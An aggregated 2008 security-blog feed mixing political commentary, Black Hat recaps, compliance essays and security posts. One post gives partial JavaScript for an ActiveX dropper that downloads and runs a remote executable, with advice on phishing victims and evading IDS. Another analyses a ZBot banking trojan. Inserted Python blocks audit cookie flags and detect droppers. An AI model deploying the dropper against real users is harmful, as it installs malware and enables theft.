Saturday, August 30, 2008

Spliced feed for Security Bloggers Network

"... one day live in a nation where they will not be judged by the color of their skin, but by the content of their character" [StillSecure, After All These Years]

Posted: 29 Aug 2008 03:37 PM CDT

Colorful people for a Better World, Barack Obama, Martin Luther King (Ben Heine) by Ben Heine.

Republican or Democrat, liberal or conservative, white, black, brown, red or yellow, as an American you had to feel proud last night. To see that as a country we have come to a point that one of the two mainstream political parties would nominate an African-American person for the office of the Presidency of the United States of America was a big step.  Whether you think Barack Obama is good or bad, whether you vote for him or not, what he has accomplished within one lifetime of Martin Luther King's "I have a dream" speech is truly amazing. Similar to what he said last night, it is not just about him either.  It is about us as a country as well.  Our country has grown enough where truly the color of a person's skin is not the determining factor on what a person can accomplish. I am not naive. I know that there are still people in this country who are going to decide to support Obama or not strictly on the color of his skin.  For those people I feel sorry. Support or don't support Obama because you think he is or is not the right person for the job, but not because of the color of his skin. 

I was reminded exactly what a huge step this was in reading Adam's Emergent Chaos blog today.  He has republished the testimony of a woman to the credentials committee of the 1964 Democratic national convention.  I don't want to reprint the whole thing, so please click here and then hit back on your browser when you are done.

Back already? What do you think?  Can you believe that this horrific story was just over 40 years ago?  Not to brag about my age, but I was alive when this happened.  I remember being bussed to a different neighborhood for school.  There were race riots in 1968.  Can this be the same country? 

And now we have a woman as the VP candidate for the Republicans.  This is probably almost 20 years after Geraldine Ferraro ran for the Democrats, but is nevertheless quite a milestone. 

Whomever you vote for this election day, it is a proud day to be an American and that old adage of anyone can grow up to be President is truer than ever!

44 Years [Emergent Chaos]

Posted: 29 Aug 2008 11:11 AM CDT

Mary Dudziak posted the testimony of Fannie Lou Hamer before the credentials committee of the 1964 Democratic convention. It's worth reading in full:

Mr. Chairman, and to the Credentials Committee, my name is Mrs. Fannie Lou Hamer, and I live at 626 East Lafayette Street, Ruleville, Mississippi, Sunflower County, the home of Senator James O. Eastland, and Senator Stennis.

It was the 31st of August in 1962 that eighteen of us traveled twenty-six miles to the county courthouse in Indianola to try to register to become first-class citizens.

We was met in Indianola by policemen, Highway Patrolmen, and they only allowed two of us in to take the literacy test at the time. After we had taken this test and started back to Ruleville, we was held up by the City Police and the State Highway Patrolmen and carried back to Indianola where the bus driver was charged that day with driving a bus the wrong color.

After we paid the fine among us, we continued on to Ruleville, and Reverend Jeff Sunny carried me four miles in the rural area where I had worked as a timekeeper and sharecropper for eighteen years. I was met there by my children, who told me that the plantation owner was angry because I had gone down to try to register.

After they told me, my husband came, and said the plantation owner was raising Cain because I had tried to register. Before he quit talking the plantation owner came and said, "Fannie Lou, do you know - did Pap tell you what I said?"

And I said, "Yes, sir."

He said, "Well I mean that." He said, "If you don't go down and withdraw your registration, you will have to leave." Said, "Then if you go down and withdraw," said, "you still might have to go because we are not ready for that in Mississippi."

And I addressed him and told him and said, "I didn't try to register for you. I tried to register for myself."

I had to leave that same night.

On the 10th of September 1962, sixteen bullets was fired into the home of Mr. and Mrs. Robert Tucker for me. That same night two girls were shot in Ruleville, Mississippi. Also Mr. Joe McDonald's house was shot in.

And June the 9th, 1963, I had attended a voter registration workshop; was returning back to Mississippi. Ten of us was traveling by the Continental Trailway bus. When we got to Winona, Mississippi, which is Montgomery County, four of the people got off to use the washroom, and two of the people - to use the restaurant - two of the people wanted to use the washroom.

The four people that had gone in to use the restaurant was ordered out. During this time I was on the bus. But when I looked through the window and saw they had rushed out I got off of the bus to see what had happened. And one of the ladies said, "It was a State Highway Patrolman and a Chief of Police ordered us out."...

I was carried to the county jail and put in the booking room. They left some of the people in the booking room and began to place us in cells. I was placed in a cell with a young woman called Miss Ivesta Simpson. After I was placed in the cell I began to hear sounds of licks and screams, I could hear the sounds of licks and horrible screams. And I could hear somebody say, "Can you say, 'yes, sir,' nigger? Can you say 'yes, sir'?"

And they would say other horrible names.

She would say, "Yes, I can say 'yes, sir.'"

"So, well, say it."

She said, "I don't know you well enough."

They beat her, I don't know how long. And after a while she began to pray, and asked God to have mercy on those people.

And it wasn't too long before three white men came to my cell. One of these men was a State Highway Patrolman and he asked me where I was from. I told him Ruleville and he said, "We are going to check this."

They left my cell and it wasn't too long before they came back. He said, "You are from Ruleville all right," and he used a curse word. And he said, "We are going to make you wish you was dead."

I was carried out of that cell into another cell where they had two Negro prisoners. The State Highway Patrolmen ordered the first Negro to take the blackjack.

The first Negro prisoner ordered me, by orders from the State Highway Patrolman, for me to lay down on a bunk bed on my face.

I laid on my face and the first Negro began to beat. I was beat by the first Negro until he was exhausted. I was holding my hands behind me at that time on my left side, because I suffered from polio when I was six years old.

After the first Negro had beat until he was exhausted, the State Highway Patrolman ordered the second Negro to take the blackjack.

The second Negro began to beat and I began to work my feet, and the State Highway Patrolman ordered the first Negro who had beat me to sit on my feet - to keep me from working my feet. I began to scream and one white man got up and began to beat me in my head and tell me to hush.

One white man - my dress had worked up high - he walked over and pulled my dress - I pulled my dress down and he pulled my dress back up.

I was in jail when Medgar Evers was murdered.

All of this is on account of we want to register, to become first-class citizens. And if the Freedom Democratic Party is not seated now, I question America. Is this America, the land of the free and the home of the brave, where we have to sleep with our telephones off the hooks because our lives be threatened daily, because we want to live as decent human beings, in America?

Thank you.

Setting the secure flag in the cookie is easy [EnableSecurity]

Posted: 29 Aug 2008 08:17 AM CDT

TechRepublic had an interesting article about the Surf Jack attack. Many people commented, some giving their own solution to the problem. However, many of these solutions do not prevent the attack because they do not really address it. Of course, whoever missed the details should check out the paper.

The attack was addressed quite a while ago, and the solution is easy to implement on many occasions. So there is no need to reinvent the wheel or create a new solution which has not been peer reviewed yet. Here I'll indicate how to set the secure flag in various languages / web application technologies. The idea is that besides making use of HTTPS instead of HTTP, one needs to set a flag in the cookie so that it cannot be leaked out in clear text.


bool setcookie ( string $name [, string $value [, int $expire [, string $path [, string $domain [, bool $secure [, bool $httponly ]]]]]] )
Note that the $secure boolean should be set to true.
Cookie helloCookie = new Cookie(”name”,text);

HttpCookie cookie = new HttpCookie(’name’);
cookie.Secure = True;
cookie.Value = ‘Joe’;
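Whatever the server-side API, what reaches the browser is a Set-Cookie header, and the Surf Jack problem is a cookie that lacks the Secure attribute in that header. The following is an added example (not code from the original post) that emits a properly flagged cookie with Python's standard library and audits a response's Set-Cookie headers for cookies that would still be sent over plain HTTP; the sample headers are constructed.

```python
"""Set and audit the Secure flag on cookies (added example, not the post's code).

A cookie without the Secure attribute is sent by the browser over plain HTTP
as well as HTTPS, so anyone who can get the victim to load an http:// URL of
the site can read it in clear text. The audit below flags such cookies in a
response's Set-Cookie headers, whichever framework produced them.
"""
from http.cookies import SimpleCookie


def build_session_cookie(name: str, value: str) -> str:
    """Return a Set-Cookie header value with Secure and HttpOnly set."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["secure"] = True     # never sent over plain HTTP
    jar[name]["httponly"] = True   # not readable from page script
    jar[name]["path"] = "/"
    return jar[name].OutputString()


def audit_set_cookie(header_value: str) -> dict:
    """Parse one Set-Cookie header value and report which flags it carries."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    # Attribute names are case-insensitive; flags have no '=value' part.
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return {
        "name": name,
        "secure": "secure" in attrs,
        "httponly": "httponly" in attrs,
    }


def find_leakable_cookies(set_cookie_headers: list) -> list:
    """Names of cookies that lack Secure and so can leak over HTTP."""
    leaks = []
    for header in set_cookie_headers:
        report = audit_set_cookie(header)
        if not report["secure"]:
            leaks.append(report["name"])
    return leaks


# Constructed sample Set-Cookie headers from one response: one safe, one not.
SAMPLE_HEADERS = [
    "SESSIONID=abc123; Path=/; Secure; HttpOnly",
    "prefs=blue; Path=/; Expires=Wed, 03 Sep 2008 10:00:00 GMT",
]

if __name__ == "__main__":
    print(build_session_cookie("SESSIONID", "abc123"))
    print("cookies without Secure:", find_leakable_cookies(SAMPLE_HEADERS))
```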

My Idle Threat Needs Adapting []

Posted: 28 Aug 2008 10:39 PM CDT

What is my idle threat?  That I was going to delete their boot.ini file.  A covert operation that could easily be done remotely and may not be detected for days, weeks or months.  Like the title implies though, I've never actually deleted someone's boot.ini file.  Now I must adapt my threat.

Vista no longer contains the object of my desire.  Boot.ini has been replaced along with a few other things involved in the boot process.  NTLDR has been replaced with the "Windows Boot Manager" and winload.exe.  Instead of NTLDR reading the boot.ini file, Windows Boot Manager, after reading the Boot Configuration Data (BCD), starts winload.exe to load the operating system.

Boot Configuration Data is stored in a hidden file (BCD) in c:\boot\.  To modify this file you use a command line utility called BCDedit.exe.

So there you have it.  My new idle threat is going to be stealing their power cable.

Its The Most Wonderful Time Of The Year []

Posted: 28 Aug 2008 09:39 PM CDT

The long, long wait is over.  College football is here!  It's been a very long offseason for us Husker fans.  After last year's debacle of a season we are eager to get this season started and put last season in the rear view mirror.  I'm not expecting a miracle season but I think a 7-5 record is the most likely record with 8-4 a possibility if they catch a break.

Saturday night Nebraska plays Western Michigan.  The ‘Skers are a 14 point favorite and I think they cover.  NU 34  WMU 14


SANS Mentor update [Kees Leune]

Posted: 28 Aug 2008 07:03 PM CDT

The nice people over at SANS just put up my course details. Before registering, please contact me for a referral code, or send me an email at

The Problem with Compliance (Updated) [Ascension Blog]

Posted: 28 Aug 2008 09:33 AM CDT

The following is a piece that was originally written for Network World’s Security Newsletter and published in March of 2006.  It was a collaborative effort between Joe Faraone, a close friend, and I.  The issue we touched on really hasn’t gone away so I thought that I’d dust it off and update it a bit. 

Sometimes we hear senior managers and executives expressing frustration with government regulation by saying that the issue has come down to a choice of either being secure or being compliant.  In fact, compliance remains the number one driver of information security as reported in the 10th Annual Global Information Security Survey conducted by Ernst & Young. 

This is consistent with the article that sparked the original version of this post.  That was an Information Security Magazine article from October 2005 in which security managers were asked to respond to the question, “What is your biggest obstacle to implementing and managing security related government regulations?” Responses reveal that the top two obstacles faced were unclear compliance related responsibilities and interpreting regulatory language. This point of view appears to be more prevalent in the private sector than the public sector.

One of the reasons for this discrepancy is that the public sector must follow a specific framework for measuring the maturity and effectiveness of its information security programs: certification and accreditation (C&A). The Federal Information Security Management Act of 2002 (FISMA) was intended to provide for the development of and maintenance of minimum controls required to protect information systems and to provide for a framework for ensuring the effectiveness of these controls. While many of the overriding principles followed in C&A are contained within the law, nowhere are the words “certification” or “accreditation” found.

FISMA points to the Office of Management and Budget (OMB) as well as the National Institute of Standards and Technology (NIST) to obtain guidance. OMB has issued its Circular A130, which requires that all federal information systems to be certified and accredited following guidelines developed by NIST.

Now the C&A process has gotten a lot of bad press, some of it well deserved, but coming from someone who has worked with the process in one form or another for the past ten years, I'd say that it comes down to a matter of implementation rather than issues with the process itself.  If the process is viewed as just another paper exercise intended to satisfy auditors then it is a waste of time, but that view is also missing the forest for the trees. 

NIST has done a laudable job of developing and revising this guidance. It provides a methodology to fully document, measure, assess, track and report on the health of information systems from the aspect of security. These guidelines show how to integrate an information security program with the systems development lifecycle as well as how to test the implemented controls.

Those in the private sector are probably wondering why this should be important to them.  Many argue that the control sets mandated by the process are too much for a private sector environment.  Others say that implementing the full set of baseline controls would be too costly and provide little ROI.  Again, my response is that you're missing the forest for the trees.  The process itself is what is valuable here, and it is flexible enough to allow any set of requirements to be utilized, not just the set of baseline controls provided by NIST. 

NIST publications and the methodology for conducting certification and accreditation are freely available and constitute an untapped publicly available security resource. Inputting the government regulations (Sarbanes Oxley, Health Insurance Portability and Accountability Act, etc.) into this framework allows the private sector to document, measure, assess, track and report upon the security posture of their information systems and how well government regulations are adhered to. The private sector can assess the maturity of their information security programs and determine how well these programs integrate into their overall business processes.

What is key for the private sector is that the process must be tailored to your environment and needs.  Herein lies the problem that has plagued C&A from its beginning - it is often applied improperly. 

When the emphasis is placed on being compliant, people go through the motions and focus on technology and checking boxes rather than leveraging the power of the framework to assess the effectiveness of their programs.

The two most basic elements of any system are often overlooked or underemphasized: the information being protected and the people who use the information. You can put in all the high security devices you want in a system, but if you do not account for the people who need to use the information system and the criticality of the information within the system, you still will not be secure.

If the C&A process is improperly applied then it does result in a lot of wasted time and paperwork. If it is properly applied then it becomes a wonderful tool to assess the effectiveness of your security controls - everything from policy and procedure down to control functionality and configuration.  It provides a holistic view of the network and security with the emphasis on being secure. Compliance is simply a milestone on that journey.

The beauty of this is that the information that you need to implement this framework is _free_ and fully available at the NIST Web site. Do you need to hire high priced consultants to come and set this up for you? No, you don’t. Although consultants can save you some time on the learning curve, the guidance available through NIST will allow you to begin the process on your own. You can then use consultants to give you an independent review of your program or to bolster areas where you might feel less comfortable. But remember that you must tailor this framework to fit your environment - use what works and make sense and discard that which does not.  (Sorry government readers - this doesn’t apply to you.  You don’t have the same latitude to do that as does the private sector.)

The CIO implementing this approach can concentrate on the details of how information is protected and used rather than scurrying about wondering how to bring order to the new herd of cats that legislation has unleashed.

Take the framework that NIST has so diligently given us, plug in the requirements that you are subject to, and then sit down with your network architects, your user representatives and your key project managers and find a way to work efficiently but securely. With the NIST framework, you will be able to assess, measure, track, and deliver a more secure and user friendly network and in the process, achieve compliance.  I have done this with amazing results so I know for a fact that it works. 

Alternatively, keep enjoying your view of the forest.

Thanks for Understanding [Ascension Blog]

Posted: 28 Aug 2008 09:15 AM CDT

I’d like to apologize to everyone for being a bit lax over the last week or so.  When you start your own small business you must often wear many different hats.  It also means that there are often not that many people, if any at all, to delegate to.  I’ve spent the last week working on a few proposal responses so I have been writing - just not material for the blog. 

I also took a trip to Washington DC to meet with a few clients and potential clients.  I decided to stay with family which was nice but they don’t have Internet connectivity at their home.  I know that is a surprising thing in today’s world but they really don’t and I don’t think it is economical to get dial-up service for the few times that I’m there during the year.  (Does anyone else inwardly cringe when they hear the word dial-up?)

Now they have been trying to rectify the situation.  They live out in a rural area (as much as any area within the DC commuting area is still rural) so they have had to pay to have fiber run out to them.  Apparently it isn’t as easy as calling and having your local telecom run the line.  It takes some doing.  There is one group that comes out to run it down the public highway but they stop there.  Another group then must come out and run it up the driveway.  Since my family lives off a shared driveway this apparently requires two separate groups to run it up to their home.  One for the shared driveway and another for their private driveway.  And yet another group must then come and set it up in the house. 

Now it has been six months since this process started.  I sat in the living room and could actually see the fiber sticking out of the ground down at the top of the shared driveway.  Just a little bit to go before it actually gets into the house.  It was frustrating but not frustrating enough to pack up my laptop and head down to the Starbucks to pick up a wifi connection.  Hopefully the situation will be rectified before I go and visit in December. 

Anyway - I was able to locate a few old articles that I’ve dusted off to post here.  It feels a bit like cheating but I think the topics are still relevant and like I said I did spend a few minutes reworking them a bit.  Once I get this proposal put to bed this week I’ll work on a few posts for next week.  There is a lot of material just not enough time to get to it. 

Thanks for understanding.

Cisco buys Exchange-a-like vendor PostPath [Richi Jennings]

Posted: 28 Aug 2008 05:41 AM CDT

Updated with more commentary 4.16pm UTC. Hello, Techmeme.

Suddenly, things are getting interesting again in the Exchange-alternatives market.

The quintessential growth-by-acquisition specialist, Cisco (CSCO), has just announced that it's acquiring PostPath.

Once again, Cisco makes a sound investment in an email technology vendor. Just like it did with IronPort. Great choice.

These are the clever guys who reverse-engineered the Exchange client protocol, MAPI/RPC, and the related on-the-wire details needed to make a vanilla install of Outlook talk to a non-Exchange mail server with full fidelity. Impressive stuff.

Despite Om Malik's analysis, this is quite a bit different from Zimbra.

Of all the other Exchange alternatives, PostPath has the most interesting architecture. And I say that as one who has years emotionally invested in the HP OpenMail technology ;-)

All the others rely on additional software on the desktop. In the case of OpenMail/SamsungContact/Scalix/Domino/etc., a MAPI service provider "plugin". Or, like Bynari/OpenXchange/etc., a separate app that synchronized an IMAP store with an Outlook.PST (personal store file).

I think Cisco fell out of love with Microsoft a while back. Something to do with VoIP support in Exchange and how Cisco thought it was Microsoft's partner but it turned out that Microsoft was competing with them. Nothing familiar there at all...

Sounds like Cisco wants to offer SaaS collaboration, based on PostPath and WebEx. Whoever said the email world has become dull and uninteresting?

Thanks to Jeff Brainard for the tip.

5th Website Security Statistics Report [Jeremiah Grossman]

Posted: 27 Aug 2008 06:11 PM CDT

For the last month I've been compiling our third quarter 2008 Website Security Statistics Report, which contains a comprehensive vulnerability analysis of over 600 real live websites. We're talking 11,000 verified vulnerabilities collected from typically weekly assessments. This type of data is not available from reports by Symantec, Mitre (CVE), IBM X-Force, SANS, or anywhere else and we're excited to be able to share it.

We put a ton of work into this report and there is a massive amount of data. Highlights include a revised Top Ten list of vulnerabilities, updated Time-to-Fix metrics, vulnerability remediation percentages showing progress, vertical market comparison, and so on. The information is really valuable because it provides visibility into the future trends, trouble spots, and what action items should be considered.

On Wednesday, August 27th, 11:00 AM PDT I'll be hosting an hour-long webinar to go over the results. Attendees will be given the opportunity to be the first to see the results and ask questions. Registration is free, but space is limited. If you are interested in attending, now is the time to register.

Western Union MTCN trojan [mxlab - all about anti virus and anti spam]

Posted: 27 Aug 2008 05:06 PM CDT

MX Lab just intercepted a bunch of emails from "Western Union" claiming that your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service. Sounds really scary at first.

The sender's address is spoofed and random, and the subject contains "Western Union MTCN #5993705206". The numbers and even the subject itself can change during the distribution later on.

The content of the email:


Attention! The wire sent to Maksim Zverev, Moscow, Russia has been blocked by our security service.

Your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service (case No. 42976 since the recipient has been undergoing the international retrieval by the InterPol.

Please contact the closest Western Union office and make sure you have your ID card, the credit card that was used for making the payment, and the invoice file with you.

(The invoice file is attached to this message; please print it out and hand it to our agent.)

You can find the address of the closest Western Union agent on our website at

Thank you!

First of all, the sender's address and the first paragraph of the email should identify this email as suspicious and dangerous. Did you send a wire to someone in Russia lately? The chance is quite small, I think.

Furthermore, the "invoice" is an executable inside a Zip archive. Even if your anti virus engine isn't up to date yet, it should be clear to anyone that this is a virus. Only one anti virus engine, Sophos, detects the trojan at the moment, so be careful.

And yes, our ZBot trojan is back again as a new variant. It's a banking trojan that disables the firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with remote access to the compromised system.

Some files are created on your system, like %System%\oembios.exe (its aliases are Mal/EncPk-CZ [Sophos] and PWS:Win32/Zbot.gen!B [Microsoft]).

The folder %System%\sysproc64 will be created for %System%\sysproc64\sysproc32.sys and %System%\sysproc64\sysproc86.sys. The Windows registry is modified, and a connection is made to an external IP on port 80 with a GET request for bone/no.bin.

Virus Total permalink and MD5: 07b8c31d8519f04103cde011d24c82ec.

Owning the Client without an Exploit [Carnal0wnage Blog]

Posted: 27 Aug 2008 04:45 PM CDT

So after a long hiatus of no posts I figured it was time to step up and post something that may be of interest to pentesters. In the spirit of continuity to some previous posts about client-side attacks and as a follow up to some discussions that Chris and I have been having, this post will be about Client-side Ownage.

It's nothing groundbreaking but may have a place in your arsenal of tools and attack vectors. What do you do when all those cool client-side attacks in Metasploit fail? Damn those companies that patch 3rd party products. As shown in the previous posts it's still possible to gather a great deal of information about the remote user, host and network using PHP and some Java but what do you do when you need a foothold on that host to pivot further into the network?

Enter the Dropper. Using JavaScript and Microsoft's XMLHTTPRequest Object it is possible to download and run your backdoor with just a little interaction from the victim. The XMLHTTPRequest Object, a core component of AJAX, provides support for client-side communication with a HTTP server. A user can make use of the XMLHTTP Object to send a request and have the XML DOM parse that request. Great if you have data such as XML that you need to parse and display on a page for example.

What about requesting another file type like, oh I don't know, an exe? This might have some value. :) Let's take a look at a JavaScript function to do just that.

First we need to create our object elements and the required attributes needed to download and execute the file we want:

function dropper() {

var x = document.createElement('object');

try {
var obj = x.CreateObject('msxml2.XMLHTTP','');
var app = x.CreateObject('Shell.Application','');
var str = x.CreateObject('','');

We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.

We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.

Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.

The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.

Now let's grab the file, install it to a directory of our choice and run it.

try {
str.type = 1;'GET','',false);
var path = './/..//svchosts.exe';
catch(e) {}

First we use the Type property to set the type of data in the stream object. 1 is for Binary.

Next we use the XMLHTTPRequest Open Method to initialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.

The Open Method is used to create and open a Stream object. The Write Method is used to write the binary data to a binary Stream object. After specifying the path, we use the SaveToFile method to save the contents of our open Stream object to a local file of our choosing. In this case we use an option value of 2 that overwrites the file if it already exists. We then close the object.

The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.

try {
catch(e) {}
catch(e) {}

Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.

You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.

One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.

Variants of the method we have just discussed are actually widely used by malware authors on their sites to drop files onto users' systems. Have a look at the next spam email you get and decode the JavaScript on the page.
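From the defender's side, the chain this post describes is a recognisable fingerprint: a page script that instantiates msxml2.XMLHTTP, ADODB.Stream and Shell.Application together is downloading something to disk and running it. The following is an added example (not code from the original post) of a small content scanner that undoes the string-splitting obfuscation mentioned above before matching, so that a concatenated object name is still seen; the benign and suspect page samples are constructed.

```python
"""Flag the ActiveX download-and-execute chain in page content (added example).

The dropper pattern needs three objects: an HTTP client (msxml2.XMLHTTP),
a binary stream that can write to disk (ADODB.Stream) and a shell object
that can launch the result (Shell.Application). Seeing all three in one
script is a strong signal. Split string literals such as 'ADO' + 'DB.Stream'
are joined first so that the simple obfuscation does not hide the names.
"""
import re

# Lower-cased names worth reporting; the first three form the full chain.
CHAIN = {"msxml2.xmlhttp", "adodb.stream", "shell.application"}
INDICATORS = sorted(CHAIN) + ["rds.dataspace", "savetofile", "shellexecute"]

# 'abc' + 'def'  ->  'abcdef'   (quote, literal, same quote, plus, quote)
CONCAT_RE = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])""")


def normalize(script: str) -> str:
    """Join concatenated string literals until stable, then lower-case."""
    text, prev = script, None
    while prev != text:
        prev = text
        text = CONCAT_RE.sub(lambda m: m.group(1) + m.group(2), text)
    return text.lower()


def score_page(content: str) -> dict:
    """Return the indicators present and whether the whole chain is present."""
    text = normalize(content)
    found = [name for name in INDICATORS if name in text]
    return {"found": found, "download_and_execute": CHAIN <= set(found)}


# Constructed samples: an ordinary AJAX call and an obfuscated dropper stub.
BENIGN = """
var req = new XMLHttpRequest();
req.open('GET', '/api/items.xml', false);
req.send(null);
"""

SUSPECT = """
var x = document.createElement('object');
var obj = x.CreateObject('msx' + 'ml2.XML' + 'HTTP', '');
var app = x.CreateObject('Shell' + '.Application', '');
var str = x.CreateObject('ADO' + 'DB.Stream', '');
str.SaveToFile(path, 2);
"""

if __name__ == "__main__":
    for label, page in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, score_page(page))
```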


Off to Black Hat [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:30 PM CDT

Let me run with the pack and put up my own "off to Black Hat" post.  I leave Tuesday actually and won't get there until Tuesday evening.  I will be on a red eye home Thursday night/Friday morning.  In this way I don't break my own three day rule on Vegas.  What is my three day rule?  Suffice to say that it prevents me from spiraling down into the bowels of degeneracy.

So what am I looking forward to at Black Hat?  The Dan K / DNS stuff should be fun.  I will be cheering on my boy Hoff and I always sit in on Jeremiah.  But let's face it, I am there for the party and catching up.  I am looking forward to throwing a few back with Rothman.  Seeing Martin, Mogul and the rest of the bunch.  There are always good parties of course and free drinks and food never hurts.

Of course I will also spend some time at the StillSecure booth shaking hands and kissing babies.  If you would like to say hello feel free to stop on by.

Also, a quick thanks to all of the members of the SBN for their support on our Black Hat affiliation.  The last few weeks have seen a bunch of blogs raising the buzz on the conference.

Black Hat wrap up - secure@microsoft, booth babes and bloggers [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:28 PM CDT

You can read plenty of other blogs about some of the great presentations at Black Hat.  So I thought I would take another angle and talk about some of the other stuff that may be important to you.


1. This year's hottest party was again the Microsoft party. This year it was at the LAX club in the Luxor. As usual there were quite a number of people at the door who thought they could talk their way in or, worse yet, were told they "were on the list". I was happy to be able to go and saw many of the usual suspects there as well. I had to leave the party early to go catch my red eye flight home, so went right to the airport from the party. As I wrote earlier, Microsoft is trying really hard on security. But I couldn't help but notice the irony of this grainy, lousy picture of the DJ booth at the party. If you can, notice the computers that the DJs are using. That's right, they are Macs!

2. A new low for booth babes – What would a Shimel review of a trade show be without a booth babe rant? Hey, I recognize it is Vegas and all, but EdgeOS went way over the line this year. A booth babe dressed as a Las Vegas showgirl or some other type of costume makes a statement. I personally don't like exploiting women to make that statement, but I understand. However, these guys had women who were dressed so raunchy and classless that I could not bring myself to post a picture of them. Come on guys! If you want to resort to the booth babe thing (and BTW I think the Black Hat crowd does not respond to that), at least have a little class. These girls looked like street walkers and do you and your company no favors. Is that really the image you want to promote? Grow up!

Author's note: I have received several requests to see a picture of the booth babes in question and judge for yourself. So I am including it for you to make your own call.


3.  The Security Bloggers Network – We are back!  With the end of the Black Hat show, the SBN is going back to being the SBN.  The old logo is back and our promotion with Black Hat is at an end.  However, I want to personally thank so many of you SBN members who blogged about Black Hat.  The Black Hat marketing folks made it a point to come over to me and thank us for the overwhelming support and help of the community.  Our network delivered big time with them and they are already thinking about ways we can work together next year.  I will keep you all posted on that.


We have several new promotions we are working on with the SBN and will have more on that soon. Also, we learned some valuable lessons. Next time we will work with the network members more closely in doing these affiliations. Also, for any show like this we need to have an official bloggers get together. Not because we don't want to buy our own drinks (thanks to Chris Hoff for doing more than his share in picking up a big bar tab), but frankly we need to reserve a place that has enough space for us. Security bloggers are big time. We have a great community of people who get together. Let's make it better.


I have some other ideas around the SBN I am working on too and want to form a committee to help. If you are a member and want to get involved, please drop me a line or comment.


Anyway, another year of Black Hat is in the books. It was a good one and I can't wait until next year!


Pedal to the metal NAC [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

OK, I am not really a big car racing fan. I don't know, Long Island was not a NASCAR hotbed. Of course the Indy 500 was always big news. In any event I have become much more of a race fan since Chip Ganassi Racing became a StillSecure customer. They are using a complete NAC solution that performs both pre and post connect testing. Racing today is not about some gearheads putting in spark plugs and changing tires. It is high-tech, and their information security needs to protect their IP are a high priority.

Rather than the usual case study, our VP of marketing Jayson Ayers actually tried something new.  A video case study is what we have done.  I think it is pretty cool and in the spirit of the YouTube generation, am embedding it here.  You can read more about this on our site here.



My excellent adventure at Black Hat [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

Yesterday was a great day at Black Hat. I would tell you all about it, but it seems Mitchell thinks it best that we don't talk about what goes on here at Black Hat. Now, far be it from me to break "Cardinal Rules" (has anyone ever really thought about what exactly a "cardinal rule" is? Why not a Blue Jay or Falcon rule?), but if we can't talk about it, what good is it? I think Mitchell is confusing divulging the really juicy Vegas stuff with just the mundane. So let me tell you about my excellent adventure yesterday at Black Hat.

I was one of the multitude standing in the back listening to Dan's DNS report. You probably have already heard that it is bigger and worse than originally reported. I then spent a lot of time with the Microsoft people talking to them about their security stuff. I will tell you that despite many who rail against Microsoft, these guys actually are doing a great job on security and in dealing with the security community. Much better than a certain company named for a fruit whose marketing people killed the presentation of their own security research team. After lunch I took a front row seat to watch Hoff present on virtual security. He has some very pretty slides, but the message was clear. Great presentation by Hoff. I spent most of the rest of the afternoon catching up with lots of security bloggers here. I am amazed by the number of us here at Black Hat.

Had a quiet dinner with Mitchell (I would tell you about it but you know about what happens in Vegas with Mitchell) and then went to the Breach party at the Shadow Bar (I love that place, but it was too hot last night). We then went over to the Fuente cigar bar and next thing you know we were joined by about 30 of our closest security blogger buddies. It was a great time and there are pictures floating around twitter somewhere of it. We talked and laughed into the late hours, winding up at the Augustus cafe again for an early breakfast.

Well it is back to the show today and another round of parties tonight. Ah, it is tough living the life ;-)


When the shoe is on the other foot [StillSecure, After All These Years]

Posted: 27 Aug 2008 01:26 PM CDT

About to head over to morning sessions of Black Hat (OK, it started at 8am, but that is just an uncivil time for Las Vegas).  Before I do, let me give you a quick recap of my first night on Black Hat. I didn't get in until 10pm and got to my hotel about 11.  Looked up a few security twits and saw that Mitchell Ashley, Martin McKeay, JJ and Ryan Russell were at the Cleopatra Barge at Caesars.  I headed over there and met up.  The night was on!

We had a quick drink and then headed over to the club Pure, where Fortify was having a party. Somehow or another JJ, Ryan and I got to the VIP entrance and were headed in. Martin had to go upstairs and change out of his shorts. Mitchell, that Colorado country bumpkin, was not allowed in because he was wearing sandals. What to do? Leave Mitchell outside, or all of us not go in? I went back to my old club hopping days for the answer. I went in with JJ. Went to the bar, took off my shoes and gave them to JJ. While I stood there in socks, she brought the shoes out to Mitchell, who put them on and got in the club. Watching JJ sneak out the shoes and Mitchell walk in holding his sandals was pretty funny. But it worked. We got away from the Fortify party as it was way too crowded. We found ourselves in my favorite part of Pure, the Pussycat Doll Lounge. Five minutes later out came the Pussycats. They put on a very hot show that had us all dancing and shouting.

After that we went to my usual late night spot at Black Hat, the Augustus cafe for breakfast.  We met up with the Mogul and Hoff, who joined us.  By now it was like 2:30am Vegas time (5:30 east coast time) and it was time for bed.  I am staying at Paris, so had a nice walk but they did give me a LeMans suite which is very nice.  I still get a little confused by rooms with bidets, but it is fun.

